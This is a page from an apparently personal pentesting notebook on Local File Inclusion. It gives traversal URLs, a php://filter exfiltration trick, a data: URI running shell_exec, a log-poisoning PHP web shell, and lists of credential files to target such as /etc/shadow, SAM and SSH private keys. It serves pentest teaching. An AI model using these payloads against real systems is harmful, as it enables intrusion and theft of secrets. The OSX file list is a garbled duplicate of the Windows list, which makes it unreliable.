Tactics, Techniques, and Procedures
Personal BlogTwitterGitHubContact
  • Tactics, Techniques, and Procedures
  • ☠️Pentesting
    • Fortress
      • Automation
      • Cisco
        • Cisco Adaptive Security Appliance
        • Cisco Smart Install
      • CMS
        • Drupal
        • Wordpress
      • Exchange
      • Office365
      • Okta
      • Outlook Web Access (OWA)
      • SSH
      • Subdomain Takeover
    • Infrastructure
      • Active Directory
        • AD CS
        • Coercing Authentication
        • Credential Dumping
          • Cached Domain Credentials
          • Data Protection API (DPAPI)
          • Group Policy Preferences
          • LSA Secrets
          • LSASS Memory
          • NTDS
          • Security Account Manager (SAM)
          • Kerberos Tickets
          • Unsecured Credentials
          • WDigest
          • WiFi Profiles
        • Delegation Abuse
          • Constrained Delegation
          • Unconstrained Delegation
        • Domain Enumeration
        • Domain Dominance
          • Forge Golden Ticket
          • Forge Silver Ticket
          • Forge Trust Ticket
          • Skeleton Key
        • Group Policy Preferences
        • Kerberos
          • AS-REP Roasting
          • Kerberoasting
          • Kerberos Relaying
        • Lateral Movement
          • PowerShell
          • Windows Remote Management (WinRM)
        • Local Administrator Password Solution (LAPS)
        • NoPac
        • NTLMv1
        • Password Cracking
        • Password Policy
        • Password Spraying
        • Reconnaissance
        • Relaying
          • LDAP Relaying
          • SMB Relaying
        • Shadow Credentials
        • Zerologon
      • Database Management System (DBMS)
        • Microsoft SQL Server
      • Defense Evasion
        • Disable or Modify Tools
        • Disable Windows Event Logging
        • Impair Command History Logging
        • Timestomping
      • Low-Hanging Fruit
      • Networks
        • IPv6
        • LLMNR/NBT-NS Poisoning
        • Network Scanning
        • Network Sniffing
        • Segmentation Testing
        • Simple Network Management Protocol (SNMP)
        • Subnet Enumeration
        • Identifying Domain Information
      • Persistence
        • Create Account
        • Remote Desktop
        • Services
          • Service Privilege Escalation / Persistence
          • Systemd Service Persistence
        • Web Shell
        • DLL Hijacking
      • Pivoting
      • Privilege Escalation
        • Linux
          • Setuid and Setgid
        • Windows
          • Privilege Abuse
            • SeImpersonatePrivilege
            • SeLoadDriverPrivilege
          • Service Exploitation
    • Initial Access
      • Phishing
        • Creating Templates
          • Leveraging AI During Template Creation
        • Payloads
          • Non-malicious Callback
          • Macros
    • OSINT
      • Identifying Users
      • Network Information
      • Search Engines
    • Web Applications
      • Access Control
      • APIs
        • Swagger API
      • Authentication
        • Account Takeover
      • Clickjacking
      • Cross Origin Resource Sharing (CORS)
      • Cross Site Request Forgery (CSRF)
      • Document Object Model (DOM)
      • File Upload
      • Google Dorking
      • GraphQL
      • HTTP Request Smuggling
      • Information Disclosure
      • Insecure Direct Object Reference (IDOR)
      • Injection Vulnerabilities
        • Cross-Site Scripting (XSS)
          • Blind Cross-Site Scripting
          • Finding Cross-Site Scripting
          • Stealing Cookies
          • XSS Payloads
        • CSV Injection
        • XML External Entity Injection (XXE)
        • LDAP Injection
        • NoSQL Injection
        • Server-Side Template Injection
        • SQL Injection
      • JSON Web Tokens (JWT)
      • Local File Inclusion (LFI)
      • OAuth
      • Open Redirection
      • Password Reset Poisoning
      • Prototype Pollution
      • Race Condition
      • Rate Limit Bypass
      • Remote Code Execution (RCE)
      • Remote File Inclusion (RFI)
      • Suspicious Parameters
      • Tooling
        • Burp Suite
          • Authentication / Proxy Issues
          • Intruder Attack Types
          • Match and Replace
          • Quality of Life
        • Misc Tooling
      • WAF Bypasses
      • WebSockets
      • Web Cache Deception
      • Web Cache Poisoning
    • Wireless
      • WPA / WPA2
        • Alfa Troubleshooting
        • Enterprise
        • Personal
    • Cloud
      • Amazon Web Services (AWS)
      • Microsoft Azure
  • 🧨Red Teaming
    • C2
      • Cobalt Strike
      • Empire
      • Metasploit
        • Metasploit Datatabase
      • Mythic
      • Sliver
    • Malware Dev
    • Offensive Infrastructure
      • Cloud Fronting
      • Redirectors
      • OpSec
      • Phishing Infrastructure
      • Creating a Dropbox
    • Offensive Tactics
    • Philosophy
  • 🦋Bug Bounty
    • Bug Bounty Tips & Tricks
  • 📖Resources
    • Blog Posts and Goodies
    • Checklists
    • Offensive Security Notes
    • Tooling Repository
    • Active Directory Toolkit
Powered by GitBook
On this page
  • Examples
  • Common Locations
  • Remote Code Execution via LFI (Log Injection)
  • Additional Notes
  • References
  1. Pentesting
  2. Web Applications

Local File Inclusion (LFI)

A local file inclusion (LFI) vulnerability is the process of including files that are locally present on the target server, through exploitation of vulnerable inclusion procedures implemented in the application.

Local file inclusion vulnerabilites occur when a page receives the path to the file that has to be included as input, which is not properly sanitized, allowing directory traversal characters to be injected.

Examples

The most basic form of a exploiting a LFI vulnerability looks like the following:

https://mysecureserver.com/file.php?target=../../../../../etc/passwd

If we want to get a file, it is best to base64 encode it. This will ensure that we can exfiltrate files rather than the server excuting the file. This can be accomplished with the following command:

php://filter/convert.base64-encode/resource=$file

Additionally, the following command demonstrates how we could execute code with the shell_exec function:

data:text/plain,<?php echo shell_exec("whoami") ?>

Common Locations

This section lists common files to look for when testing for Local File Inclusion, I have linked additional lists in the 'References' section.

Linux

/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root

Windows

%SYSTEMROOT%repairsystem
%SYSTEMROOT%repairSAM
%WINDIR%win.ini
%SYSTEMDRIVE%boot.ini
%WINDIR%Panthersysprep.inf
%WINDIR%system32configAppEvent.Evt

OSX

%SYSTEMROOT%repairsystem
%SYSTEMROOT%repairSAM
%SYSTEMROOT%repairSAM
%WINDIR%win.ini
%SYSTEMDRIVE%boot.ini
%WINDIR%Panthersysprep.inf
%WINDIR%system32configAppEvent.Evt

Remote Code Execution via LFI (Log Injection)

Log Injection / Log Poisoning is a technique used to obtain a reverse shell from a LFI vulnerability. In order to make this attack work, an attacker will attempt to inject a malicious payload into the server log.

  • If we are able to access server logs such as /var/log/apache2/access.log we can modify our User-Agent to be a malicious payload which could result in us obtaining remote code execution.

# Sample PHP Payload
<?php system($_GET['c']); ?>

After injecting the payload, we can access it via the following URL:

https://$url/var/log/httpd&c=whoami

Additional Notes

  • Sometimes during Local File Inclusion, the web server may append something like .php or .config to the file. For example, including /etc/passwd may be rendered as /etc/passwd.php. This occurs when the include function uses a parameter like ?page and concatenates the .php extension to the file. In versions of PHP below 5.3, ending the URL with a null byte (%00) will cause the interpreter to stop reading, this would then allow you to include and view the intended page.

  • If you have identified LFI impacting a Linux host, you may be able to access the .ssh/id_rsa file of identified users. These are easily identified from reading the contents of the /etc/passwd file.

  • If you have identified an LFI vulnerability, try and read /var/run/secrets/kubernetes.io/serviceaccount to see if you can harvest Kubernetes information.

References

PreviousJSON Web Tokens (JWT)NextOAuth

Last updated 1 year ago

☠️
LogoWSTG - v4.2 | OWASP Foundation